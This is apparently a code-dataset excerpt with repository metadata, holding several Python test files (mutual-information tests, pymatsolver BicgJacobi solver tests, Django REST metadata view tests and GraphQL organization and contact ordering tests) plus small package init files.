df["c1"] = c1 df["c2"] = c2 pmi = self.mi(df, "c1", "c2") r = mutual_info(0, 1, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) r = mutual_info(1, 0, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) def test_halfhalf(self): df = pd.DataFrame() c1 = [chr(1) for _ in range(50)] c2 = [2 for _ in range(50)] c3 = [0.7 for _ in range(50)] c1.extend(["zz" for _ in range(50)]) c2.extend([100 for _ in range(50)]) c3.extend([32. for _ in range(50)]) df["c1"] = c1 df["c2"] = c2 df["c3"] = c3 pmi = self.mi(df, "c1", "c2") r = mutual_info(0, 1, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) r = mutual_info(1, 0, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) pmi = self.mi(df, "c1", "c3") r = mutual_info(0, 2, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) r = mutual_info(2, 0, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) pmi = self.mi(df, "c2", "c3") r = mutual_info(1, 2, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) r = mutual_info(2, 1, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) def test_halfhalf_shuffled(self): for _ in range(2): df = pd.DataFrame() c1 = [chr(1) for _ in range(50)] c2 = [2 for _ in range(50)] c3 = [0.7 for _ in range(50)] c1.extend(["zz" for _ in range(50)]) c2.extend([100 for _ in range(50)]) c3.extend([32. for _ in range(50)]) random.shuffle(c1) random.shuffle(c2) random.shuffle(c3) df["c1"] = c1 df["c2"] = c2 df["c3"] = c3 pmi = self.mi(df, "c1", "c2") r = mutual_info(0, 1, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) r = mutual_info(1, 0, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) pmi = self.mi(df, "c1", "c3") r = mutual_info(0, 2, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) r = mutual_info(2, 0, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) pmi = self.mi(df, "c2", "c3") r = mutual_info(1, 2, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) r = mutual_info(2, 1, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) def test_halfhalf_shuffled_withnull(self): for _ in range(2): df = pd.DataFrame() c1 = [chr(1) for _ in range(50)] c2 = [2 for _ in range(50)] c3 = [0.7 for _ in range(50)] c1.extend([None for _ in range(50)]) c2.extend([np.NaN for _ in range(50)]) c3.extend([None for _ in range(50)]) random.shuffle(c1) random.shuffle(c2) random.shuffle(c3) df["c1"] = c1 df["c2"] = c2 df["c3"] = c3 pmi = self.mi(df, "c1", "c2") r = mutual_info(0, 1, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) r = mutual_info(1, 0, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) pmi = self.mi(df, "c1", "c3") r = mutual_info(0, 2, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) r = mutual_info(2, 0, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) pmi = self.mi(df, "c2", "c3") r = mutual_info(1, 2, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) r = mutual_info(2, 1, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) def test_mixed_shuffled_with_null(self): for _ in range(2): df = pd.DataFrame() c1 = [chr(i) for i in range(50)] c2 = [i for i in range(1, 51)] c3 = [i / 0.7 for i in range(1, 51)] c1.extend([None for _ in range(50)]) c2.extend([np.NaN for _ in range(50)]) c3.extend([None for _ in range(50)]) random.shuffle(c1) random.shuffle(c2) random.shuffle(c3) df["c1"] = c1 df["c2"] = c2 df["c3"] = c3 pmi = self.mi(df, "c1", "c2") r = mutual_info(0, 1, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) r = mutual_info(1, 0, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) pmi = self.mi(df, "c1", "c3") r = mutual_info(0, 2, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) r = mutual_info(2, 0, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) pmi = self.mi(df, "c2", "c3") r = mutual_info(1, 2, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001) r = mutual_info(2, 1, df)[0] self.assertAlmostEqual(r, pmi, delta=0.000001)

33.933673

64

0.501729

951

6,651

3.423764

0.07571

0.075246

0.066646

0.191646

0.880221

0.865172

0.837224

0.82801

0

0.110474

0.344008

6,651

195

65

34.107692

0.635801

0

0.802395

0

0.015637

0

0.185629

1

0.053892

false

0

0.035928

0

0.107784

0

null

0

1

0

1

0

null

0

8

24e41a528fc119e45d17bbad38796043350683b6

2,425

py

Python

tests/test_BicgJacobi.py

cauachagas/pymatsolver

89d4b3d3bc8d0ac48b4524bd03658d6c9f78da8d

[ "MIT" ]

18

2019-02-03T07:53:10.000Z

2022-03-05T01:09:05.000Z

tests/test_BicgJacobi.py

cauachagas/pymatsolver

89d4b3d3bc8d0ac48b4524bd03658d6c9f78da8d

[ "MIT" ]

19

2015-05-13T16:19:24.000Z

2018-02-21T16:39:00.000Z

tests/test_BicgJacobi.py

cauachagas/pymatsolver

89d4b3d3bc8d0ac48b4524bd03658d6c9f78da8d

[ "MIT" ]

10

2015-05-06T00:44:22.000Z

2018-02-15T18:18:56.000Z

import unittest from pymatsolver import BicgJacobi import numpy as np import scipy.sparse as sp TOL = 1e-6 class TestBicgJacobi(unittest.TestCase): def setUp(self): nSize = 100 A = sp.rand(nSize, nSize, 0.05, format='csr', random_state=100) A = A + sp.spdiags(np.ones(nSize), 0, nSize, nSize) A = A.T*A A = A.tocsr() np.random.seed(1) sol = np.random.rand(nSize, 4) rhs = A.dot(sol) self.A = A self.rhs = rhs self.sol = sol def test(self): rhs = self.rhs Ainv = BicgJacobi(self.A, symmetric=True) solb = Ainv*rhs for i in range(3): err = np.linalg.norm( self.A*solb[:, i] - rhs[:, i]) / np.linalg.norm(rhs[:, i]) self.assertLess(err, TOL) Ainv.clean() def test_T(self): rhs = self.rhs Ainv = BicgJacobi(self.A, symmetric=True) Ainv.maxIter = 2000 AinvT = Ainv.T solb = AinvT*rhs for i in range(3): err = np.linalg.norm( self.A.T*solb[:, i] - rhs[:, i]) / np.linalg.norm(rhs[:, i]) self.assertLess(err, TOL) Ainv.clean() class TestPardisoComplex(unittest.TestCase): def setUp(self): nSize = 100 A = sp.rand(nSize, nSize, 0.05, format='csr', random_state=100) A.data = A.data + 1j*np.random.rand(A.nnz) A = A.T.dot(A) + sp.spdiags(np.ones(nSize), 0, nSize, nSize) A = A.tocsr() np.random.seed(1) sol = np.random.rand(nSize, 5) + 1j*np.random.rand(nSize, 5) rhs = A.dot(sol) self.A = A self.rhs = rhs self.sol = sol def test(self): rhs = self.rhs Ainv = BicgJacobi(self.A, symmetric=True) solb = Ainv*rhs for i in range(3): err = np.linalg.norm( self.A*solb[:, i] - rhs[:, i]) / np.linalg.norm(rhs[:, i]) self.assertLess(err, TOL) Ainv.clean() def test_T(self): rhs = self.rhs Ainv = BicgJacobi(self.A, symmetric=True) Ainv.maxIter = 2000 AinvT = Ainv.T solb = AinvT*rhs for i in range(3): err = np.linalg.norm( self.A.T*solb[:, i] - rhs[:, i]) / np.linalg.norm(rhs[:, i]) self.assertLess(err, TOL) Ainv.clean() if __name__ == '__main__': unittest.main()

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null

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null

0

7

24e77f661f89e90f6d5c744150de0e27bffaa710

16,410

py

Python

example_project/tests/views/test_rest_metadata_view.py

warrenwestfall/django-custom-table

dab69502661ed272ffb4d4a73aa4c3de3b54805b

[ "MIT" ]

null

example_project/tests/views/test_rest_metadata_view.py

warrenwestfall/django-custom-table

dab69502661ed272ffb4d4a73aa4c3de3b54805b

[ "MIT" ]

null

example_project/tests/views/test_rest_metadata_view.py

warrenwestfall/django-custom-table

dab69502661ed272ffb4d4a73aa4c3de3b54805b

[ "MIT" ]

null

from django.urls import reverse from tests.base import BaseRestSpaFormatTest from example_app.models import RestSpaFormatMetadata, RestSpaFormatCustomTable class RestMetadataViewTest(BaseRestSpaFormatTest): def setUp(self): self.setup_metadata() def test_get_list(self): response = self.client.get('/rest/metadata/') self.assertEqual(response.status_code, 200) response = response.json() self.assertEqual(1, len(response)) self.assertDictEqual(response[0], { "name": "test", "title": "Test", "plural": "Tests", "storage_app_label": "example_app", "storage_model_name": "RestSpaFormatCustomTable", "custom_data": self.custom_data, }) def test_get_record(self): response = self.client.get('/rest/metadata/test/') self.assertEqual(response.status_code, 200) response = response.json() # print(response) self.assertEqual(response['name'], 'test') self.assertEqual(response['title'], 'Test') self.assertEqual(response['plural'], 'Tests') self.assertEqual(response['storage_app_label'], 'example_app') self.assertEqual(response['storage_model_name'], 'RestSpaFormatCustomTable') self.assertEqual(response['custom_data'], self.custom_data) self.assertEqual(response['list_metadata'], [ {"name": "name", "type": "char"}, {"name": "nickname", "type": "char"}, {"name": "title", "type": "char"}, {"name": "status", "type": "char"}, {"name": "crm_id", "type": "integer"}, {"name": "erp_id", "type": "integer"}, {"name": "count", "type": "integer"}, {"name": "quantity", "type": "integer"}, {"name": "summary", "type": "text"}, {"name": "results", "type": "text"}, {"name": "start_amount", "type": "float"}, {"name": "end_amount", "type": "float"}, {"name": "is_active", "type": "boolean"}, {"name": "is_superuser", "type": "boolean"}, {"name": "opened", "type": "datetime"}, {"name": "closed", "type": "datetime"}, {"name": "list_price", "type": "decimal-1000-2"}, {"name": "sale_price", "type": "decimal-1000-2"}, {"name": "id", "type": "integer", "hidden": True}, {"name": "created", "type": "datetime"}, {"name": "modified", "type": "datetime"}, {"name": "static_string", "type": "char"}, {"name": "static_text", "type": "text"}, ]) self.assertEqual(response['form_metadata'], { "title": "Test", "type": "object", "properties": { "name": {"type": "string", "title": "Name", "maxLength": 64}, "nickname": {"type": "string", "title": "Nickname", "maxLength": 16}, "title": {"type": "string", "title": "Title", "maxLength": 128}, "status": {"type": "string", "title": "Status", "maxLength": 16}, "crm_id": {"type": "integer", "title": "CRM ID"}, "erp_id": {"type": "integer", "title": "ERP ID"}, "count": {"type": "integer", "title": "Count"}, "quantity": {"type": "integer", "title": "Quantity"}, "summary": {"type": "string", "title": "Summary", "maxLength": 1024}, "results": {"type": "string", "title": "Results", "maxLength": 1024}, "start_amount": {"type": "number", "title": "Start Amount"}, "end_amount": {"type": "number", "title": "End Amount"}, "is_active": {"type": "boolean", "title": "Is Active"}, "is_superuser": {"type": "boolean", "title": "Is Superuser"}, "opened": {"type": "string", "format": "date-time", "title": "Date Opened"}, "closed": {"type": "string", "format": "date-time", "title": "Date Closed"}, "list_price": { "type": "string", "format": "decimal-1000-2", "title": "List Price", }, "sale_price": { "type": "string", "format": "decimal-1000-2", "title": "Sale Price", }, "id": {"type": "integer", "readonly": True, "hidden": True}, "created": {"type": "string", "format": "date-time"}, "modified": {"type": "string", "format": "date-time"}, "static_string": {"type": "string", "maxLength": 32}, "static_text": {"type": "string", "maxLength": 1024}, }, }) def test_get_record_by_id(self): response = self.client.get('/rest/metadata/1/') self.assertEqual(response.status_code, 200) response = response.json() # print(response) self.assertEqual(response['name'], 'test') self.assertEqual(response['title'], 'Test') self.assertEqual(response['plural'], 'Tests') self.assertEqual(response['storage_app_label'], 'example_app') self.assertEqual(response['storage_model_name'], 'RestSpaFormatCustomTable') self.assertEqual(response['custom_data'], self.custom_data) self.assertEqual(response['list_metadata'], [ {"name": "name", "type": "char"}, {"name": "nickname", "type": "char"}, {"name": "title", "type": "char"}, {"name": "status", "type": "char"}, {"name": "crm_id", "type": "integer"}, {"name": "erp_id", "type": "integer"}, {"name": "count", "type": "integer"}, {"name": "quantity", "type": "integer"}, {"name": "summary", "type": "text"}, {"name": "results", "type": "text"}, {"name": "start_amount", "type": "float"}, {"name": "end_amount", "type": "float"}, {"name": "is_active", "type": "boolean"}, {"name": "is_superuser", "type": "boolean"}, {"name": "opened", "type": "datetime"}, {"name": "closed", "type": "datetime"}, {"name": "list_price", "type": "decimal-1000-2"}, {"name": "sale_price", "type": "decimal-1000-2"}, {"name": "id", "type": "integer", "hidden": True}, {"name": "created", "type": "datetime"}, {"name": "modified", "type": "datetime"}, {"name": "static_string", "type": "char"}, {"name": "static_text", "type": "text"}, ]) self.assertEqual(response['form_metadata'], { "title": "Test", "type": "object", "properties": { "name": {"type": "string", "title": "Name", "maxLength": 64}, "nickname": {"type": "string", "title": "Nickname", "maxLength": 16}, "title": {"type": "string", "title": "Title", "maxLength": 128}, "status": {"type": "string", "title": "Status", "maxLength": 16}, "crm_id": {"type": "integer", "title": "CRM ID"}, "erp_id": {"type": "integer", "title": "ERP ID"}, "count": {"type": "integer", "title": "Count"}, "quantity": {"type": "integer", "title": "Quantity"}, "summary": {"type": "string", "title": "Summary", "maxLength": 1024}, "results": {"type": "string", "title": "Results", "maxLength": 1024}, "start_amount": {"type": "number", "title": "Start Amount"}, "end_amount": {"type": "number", "title": "End Amount"}, "is_active": {"type": "boolean", "title": "Is Active"}, "is_superuser": {"type": "boolean", "title": "Is Superuser"}, "opened": {"type": "string", "format": "date-time", "title": "Date Opened"}, "closed": {"type": "string", "format": "date-time", "title": "Date Closed"}, "list_price": { "type": "string", "format": "decimal-1000-2", "title": "List Price", }, "sale_price": { "type": "string", "format": "decimal-1000-2", "title": "Sale Price", }, "id": {"type": "integer", "readonly": True, "hidden": True}, "created": {"type": "string", "format": "date-time"}, "modified": {"type": "string", "format": "date-time"}, "static_string": {"type": "string", "maxLength": 32}, "static_text": {"type": "string", "maxLength": 1024}, }, }) def test_post_list(self): post_data = { "name": "thing", "title": "Thing", "plural": "Things", "storage_app_label": "example_app", "storage_model_name": "RestSpaFormatCustomTable", "custom_data": self.custom_data, } response = self.client.post('/rest/metadata/', post_data, 'application/json') self.assertEqual(response.status_code, 201) response = response.json() self.assertDictEqual(response, { "pk": 2, }) self.assertEqual(2, RestSpaFormatMetadata.objects.all().count()) new_record = RestSpaFormatMetadata.objects.get(pk=2) self.assertEqual(new_record.name, 'thing') self.assertEqual(new_record.title, 'Thing') self.assertEqual(new_record.plural, 'Things') self.assertEqual(new_record.storage_app_label, 'example_app') self.assertEqual(new_record.storage_model_name, 'RestSpaFormatCustomTable') self.assertEqual(new_record.custom_data, self.custom_data) self.assertDictEqual(new_record.custom_to_db_map, { "name": "ctf_indexed_char0000", "nickname": "ctf_indexed_char0001", "title": "ctf_char0000", "status": "ctf_char0001", "crm_id": "ctf_indexed_integer0000", "erp_id": "ctf_indexed_integer0001", "count": "ctf_integer0000", "quantity": "ctf_integer0001", "summary": "ctf_text0000", "results": "ctf_text0001", "start_amount": "ctf_float0000", "end_amount": "ctf_float0001", "is_active": "ctf_boolean0000", "is_superuser": "ctf_boolean0001", "opened": "ctf_datetime0000", "closed": "ctf_datetime0001", "list_price": "ctf_decimal-1000-20000", "sale_price": "ctf_decimal-1000-20001", }) self.assertDictEqual(new_record.db_to_custom_map, { "ctf_indexed_char0000": "name", "ctf_indexed_char0001": "nickname", "ctf_char0000": "title", "ctf_char0001": "status", "ctf_indexed_integer0000": "crm_id", "ctf_indexed_integer0001": "erp_id", "ctf_integer0000": "count", "ctf_integer0001": "quantity", "ctf_text0000": "summary", "ctf_text0001": "results", "ctf_float0000": "start_amount", "ctf_float0001": "end_amount", "ctf_boolean0000": "is_active", "ctf_boolean0001": "is_superuser", "ctf_datetime0000": "opened", "ctf_datetime0001": "closed", "ctf_decimal-1000-20000": "list_price", "ctf_decimal-1000-20001": "sale_price", }) def test_patch_title(self): patch_data = { 'title': 'Gigger', 'plural': 'Giggers', } response = self.client.patch('/rest/metadata/test/', patch_data, 'application/json') self.assertEqual(response.status_code, 202) updated_record = RestSpaFormatMetadata.objects.get(pk=1) self.assertEqual(updated_record.name, 'test') self.assertEqual(updated_record.title, 'Gigger') self.assertEqual(updated_record.plural, 'Giggers') def test_patch_title_by_id(self): patch_data = { 'title': 'Gigger', 'plural': 'Giggers', } response = self.client.patch('/rest/metadata/1/', patch_data, 'application/json') self.assertEqual(response.status_code, 202) updated_record = RestSpaFormatMetadata.objects.get(pk=1) self.assertEqual(updated_record.name, 'test') self.assertEqual(updated_record.title, 'Gigger') self.assertEqual(updated_record.plural, 'Giggers') def test_patch_add_indexed_char(self): record = RestSpaFormatCustomTable(metadata = self.metadata) record.set_custom_value('name', 'Robert') record.set_custom_value('nickname', 'Bob') record.save() self.custom_data.append({ "name": "code", "type": "indexed_char", "form": { "title": "Code", "max_length": 64, }, }) patch_data = { 'custom_data': self.custom_data, } response = self.client.patch('/rest/metadata/test/', patch_data, 'application/json') self.assertEqual(response.status_code, 202) updated_record = RestSpaFormatMetadata.objects.get(pk=1) self.assertEqual(updated_record.name, 'test') self.assertEqual(updated_record.custom_data, self.custom_data) self.assertDictEqual(updated_record.custom_to_db_map, { "name": "ctf_indexed_char0000", "nickname": "ctf_indexed_char0001", "title": "ctf_char0000", "status": "ctf_char0001", "crm_id": "ctf_indexed_integer0000", "erp_id": "ctf_indexed_integer0001", "count": "ctf_integer0000", "quantity": "ctf_integer0001", "summary": "ctf_text0000", "results": "ctf_text0001", "start_amount": "ctf_float0000", "end_amount": "ctf_float0001", "is_active": "ctf_boolean0000", "is_superuser": "ctf_boolean0001", "opened": "ctf_datetime0000", "closed": "ctf_datetime0001", "list_price": "ctf_decimal-1000-20000", "sale_price": "ctf_decimal-1000-20001", "code": "ctf_indexed_char0002", }) self.assertDictEqual(updated_record.db_to_custom_map, { "ctf_indexed_char0000": "name", "ctf_indexed_char0001": "nickname", "ctf_char0000": "title", "ctf_char0001": "status", "ctf_indexed_integer0000": "crm_id", "ctf_indexed_integer0001": "erp_id", "ctf_integer0000": "count", "ctf_integer0001": "quantity", "ctf_text0000": "summary", "ctf_text0001": "results", "ctf_float0000": "start_amount", "ctf_float0001": "end_amount", "ctf_boolean0000": "is_active", "ctf_boolean0001": "is_superuser", "ctf_datetime0000": "opened", "ctf_datetime0001": "closed", "ctf_decimal-1000-20000": "list_price", "ctf_decimal-1000-20001": "sale_price", "ctf_indexed_char0002": "code", }) response = self.client.get('/rest/data/test/1/') response = response.json() self.assertEqual(response['data']['name'], 'Robert') self.assertEqual(response['data']['nickname'], 'Bob') self.assertEqual(response['data']['code'], None) record = RestSpaFormatCustomTable.objects.get(id=1) record.set_custom_value('code', 'HR123') record.save() response = self.client.get('/rest/data/test/1/') response = response.json() self.assertEqual(response['data']['name'], 'Robert') self.assertEqual(response['data']['nickname'], 'Bob') self.assertEqual(response['data']['code'], 'HR123') def test_delete(self): response = self.client.delete('/rest/metadata/test/') self.assertEqual(response.status_code, 204) self.assertEqual(0, RestSpaFormatMetadata.objects.all().count()) def test_delete_by_id(self): response = self.client.delete('/rest/metadata/1/') self.assertEqual(response.status_code, 204) self.assertEqual(0, RestSpaFormatMetadata.objects.all().count())

46.095506

92

0.53181

1,521

16,410

5.545036

0.092045

0.087147

0.084539

0.030946

0.880365

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0.855703

0.834005

0.805075

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0

0.040552

0.289214

16,410

355

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46.225352

0.682527

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0.03012

false

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0.009036

0

0.042169

0

null

0

1

0

1

0

null

0

7

703ca6cc49995ec1f9a170040359f99c28561a1b

17,701

py

Python

src/niweb/apps/noclook/tests/schema/community/test_connections.py

SUNET/ni

f652e230524346bf0801cdf8bbb6ee63f4985cc2

[ "BSD-2-Clause-FreeBSD" ]

null

src/niweb/apps/noclook/tests/schema/community/test_connections.py

SUNET/ni

f652e230524346bf0801cdf8bbb6ee63f4985cc2

[ "BSD-2-Clause-FreeBSD" ]

2

2019-07-24T12:41:11.000Z

2020-03-31T10:10:04.000Z

src/niweb/apps/noclook/tests/schema/community/test_connections.py

SUNET/ni

f652e230524346bf0801cdf8bbb6ee63f4985cc2

[ "BSD-2-Clause-FreeBSD" ]

1

2019-02-25T14:58:20.000Z

# -*- coding: utf-8 -*- __author__ = 'ffuentes' from collections import OrderedDict from pprint import pformat from . import Neo4jGraphQLCommunityTest from apps.noclook.models import NodeHandleContext from niweb.schema import schema class OrganizationConnectionTest(Neo4jGraphQLCommunityTest): def test_organizations_order(self): ## order by name query = ''' { organizations( orderBy:name_ASC ){ edges{ node{ name } } } } ''' expected = OrderedDict([('organizations', OrderedDict([('edges', [OrderedDict([('node', OrderedDict([('name', 'organization1')]))]), OrderedDict([('node', OrderedDict([('name', 'organization2')]))])])]))]) result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) query = ''' { organizations( orderBy:name_DESC ){ edges{ node{ name } } } } ''' expected = OrderedDict([('organizations', OrderedDict([('edges', [OrderedDict([('node', OrderedDict([('name', 'organization2')]))]), OrderedDict([('node', OrderedDict([('name', 'organization1')]))])])]))]) result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) ## order by organization id query = ''' { organizations( orderBy: organization_id_ASC ){ edges{ node{ node_name organization_id } } } } ''' expected = OrderedDict([('organizations', OrderedDict([('edges', [OrderedDict([('node', OrderedDict([('node_name', 'organization1'), ('organization_id', 'ORG1')]))]), OrderedDict([('node', OrderedDict([('node_name', 'organization2'), ('organization_id', 'ORG2')]))])])]))]) result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) query = ''' { organizations( orderBy: organization_id_DESC ){ edges{ node{ node_name organization_id } } } } ''' expected = OrderedDict([('organizations', OrderedDict([('edges', [OrderedDict([('node', OrderedDict([('node_name', 'organization2'), ('organization_id', 'ORG2')]))]), OrderedDict([('node', OrderedDict([('node_name', 'organization1'), ('organization_id', 'ORG1')]))])])]))]) result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) ## order by type query = ''' { organizations( orderBy: type_ASC ){ edges{ node{ node_name type{ name value } } } } } ''' expected = OrderedDict([('organizations', OrderedDict([('edges', [OrderedDict([('node', OrderedDict([('node_name', 'organization2'), ('type', OrderedDict([('name', 'University, ' 'College ' 'dep'), ('value', 'university_coldep')]))]))]), OrderedDict([('node', OrderedDict([('node_name', 'organization1'), ('type', OrderedDict([('name', 'University, ' 'College'), ('value', 'university_college')]))]))])])]))]) result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) query = ''' { organizations( orderBy: type_DESC ){ edges{ node{ name type{ name value } } } } } ''' expected = OrderedDict([('organizations', OrderedDict([('edges', [OrderedDict([('node', OrderedDict([('name', 'organization1'), ('type', OrderedDict([('name', 'University, ' 'College'), ('value', 'university_college')]))]))]), OrderedDict([('node', OrderedDict([('name', 'organization2'), ('type', OrderedDict([('name', 'University, ' 'College ' 'dep'), ('value', 'university_coldep')]))]))])])]))]) result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) # test read permission # delete permission over organization2 self.perm_rel_org2.delete() # no order query = ''' { organizations{ edges{ node{ name } } } } ''' expected = OrderedDict([('organizations', OrderedDict([('edges', [OrderedDict([('node', OrderedDict([('name', 'organization1')]))])])]))]) result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) # order by id query = ''' { organizations( orderBy: handle_id_DESC ){ edges{ node{ name } } } } ''' result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) # order by name query = ''' { organizations( orderBy:name_ASC ){ edges{ node{ name } } } } ''' result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) # name startswith query = ''' { organizations( filter:{ AND:[{ name_starts_with: "organization" }] } ){ edges{ node{ name } } } } ''' result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) # recreate permission over organization2 self.perm_rel_org2 = \ NodeHandleContext.objects.get_or_create(nodehandle=self.organization2, \ context=self.community_ctxt)[0] def test_organizations_filter(self): # filter by name query = ''' { organizations( filter:{ AND:[{ name: "organization1" }] } ){ edges{ node{ name type{ name value } } } } } ''' expected = OrderedDict([('organizations', OrderedDict([('edges', [OrderedDict([('node', OrderedDict([('name', 'organization1'), ('type', OrderedDict([('name', 'University, ' 'College'), ('value', 'university_college')]))]))])])]))]) result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) # filter by organization_id query = ''' { organizations( filter:{ AND:[{ organization_id: "ORG1" }] } ){ edges{ node{ name type{ name value } } } } } ''' result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) # filter by type query = ''' { organizations( filter:{ AND:[{ type: "university_college" }] } ){ edges{ node{ name type{ name value } } } } } ''' result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) class ContactConnectionTest(Neo4jGraphQLCommunityTest): def test_organizations_order(self): ## order by name query = ''' { contacts( orderBy: name_ASC){ edges{ node{ name } } } } ''' expected = OrderedDict([('contacts', OrderedDict([('edges', [OrderedDict([('node', OrderedDict([ ('name', 'Jane Doe')]))]), OrderedDict([('node', OrderedDict([ ('name', 'John ' 'Smith')]))])])]))]) result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) query = ''' { contacts( orderBy: name_DESC){ edges{ node{ name } } } } ''' expected = OrderedDict([('contacts', OrderedDict([('edges', [OrderedDict([('node', OrderedDict([ ('name', 'John ' 'Smith')]))]), OrderedDict([('node', OrderedDict([ ('name', 'Jane Doe')]))]), ])]))]) result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) ## order by organization query = ''' { contacts( orderBy: organizations_ASC){ edges{ node{ name organizations{ name } } } } } ''' expected = OrderedDict([('contacts', OrderedDict([('edges', [OrderedDict([('node', OrderedDict([('name', 'Jane Doe'), ('organizations', [OrderedDict([('name', 'organization1')])])]))]), OrderedDict([('node', OrderedDict([('name', 'John Smith'), ('organizations', [OrderedDict([('name', 'organization2')])])]))])])]))]) result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) query = ''' { contacts( orderBy: organizations_DESC){ edges{ node{ name organizations{ name } } } } } ''' expected = OrderedDict([('contacts', OrderedDict([('edges', [OrderedDict([('node', OrderedDict([('name', 'John Smith'), ('organizations', [OrderedDict([('name', 'organization2')])])]))]), OrderedDict([('node', OrderedDict([('name', 'Jane Doe'), ('organizations', [OrderedDict([('name', 'organization1')])])]))]), ])]))]) result = schema.execute(query, context=self.context) assert not result.errors, result.errors assert result.data == expected, '{}\n!=\n{}'.format( pformat(expected, indent=1), pformat(result.data, indent=1) ) class ConnectionTest(Neo4jGraphQLCommunityTest): def test_filter(self): ## create ## query = ''' { groups(filter: {AND: [ { name: "group1" } ]}){ edges{ node{ handle_id name outgoing { name relation { id } } } } } } ''' result = schema.execute(query, context=self.context) assert not result.errors, result.errors

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84

0.37399

1,070

17,701

6.131776

0.084112

0.065844

0.087182

0.065844

0.872428

0.843469

0.827313

0.810242

0.80567

0.778387

0

0.008057

0.50918

17,701

606

85

29.209571

0.747122

0.018135

0

0.676692

0

0.335734

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1

0.007519

false

0

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0

null

0

1

0

1

0

null

0

7

5671e89044ade0d63fac0a3e0bb11c57162cd645

173

py

Python

secedgar/filings/__init__.py

chensteven/sec-edgar

ecfb5171f4b889b88fe868418f653885f8d5e8a5

[ "Apache-2.0" ]

null

secedgar/filings/__init__.py

chensteven/sec-edgar

ecfb5171f4b889b88fe868418f653885f8d5e8a5

[ "Apache-2.0" ]

null

secedgar/filings/__init__.py

chensteven/sec-edgar

ecfb5171f4b889b88fe868418f653885f8d5e8a5

[ "Apache-2.0" ]

null

from secedgar.filings.filing import Filing # noqa:F401 from secedgar.filings.cik import CIK # noqa: F401 from secedgar.filings.filing_types import FilingType # noqa:F401

43.25

65

0.803468

25

173

5.52

0.4

0.26087

0.413043

0.362319

0.391304

0

0.059603

0.127168

173

3

66

57.666667

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0

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1

0

null

0

1

0

1

0

1

0

8

3b1a5ef95d287e5382d28229a551bece0cdaf422

47

py

Python

V2Ray windows /lucycore/__init__.py

lucycore/V2ray_old

84b2a45605a0d854acdb163469b5b0d327bdaaef

[ "Apache-2.0" ]

null

V2Ray windows /lucycore/__init__.py

lucycore/V2ray_old

84b2a45605a0d854acdb163469b5b0d327bdaaef

[ "Apache-2.0" ]

null

V2Ray windows /lucycore/__init__.py

lucycore/V2ray_old

84b2a45605a0d854acdb163469b5b0d327bdaaef

[ "Apache-2.0" ]

1

2020-06-25T15:00:58.000Z

import lucycore.mokuaiku import lucycore.ydcore

23.5

24

0.893617

6

47

7

0.666667

0

0.06383

47

2

25

23.5

0.954545

0

1

0

true

0

1

0

1

0

1

0

null

1

0

1

0

null

0

1

0

1

0

1

0

7

3b305a148fde2481f60ed420ff0d0483cecbd8e9

94

py

Python

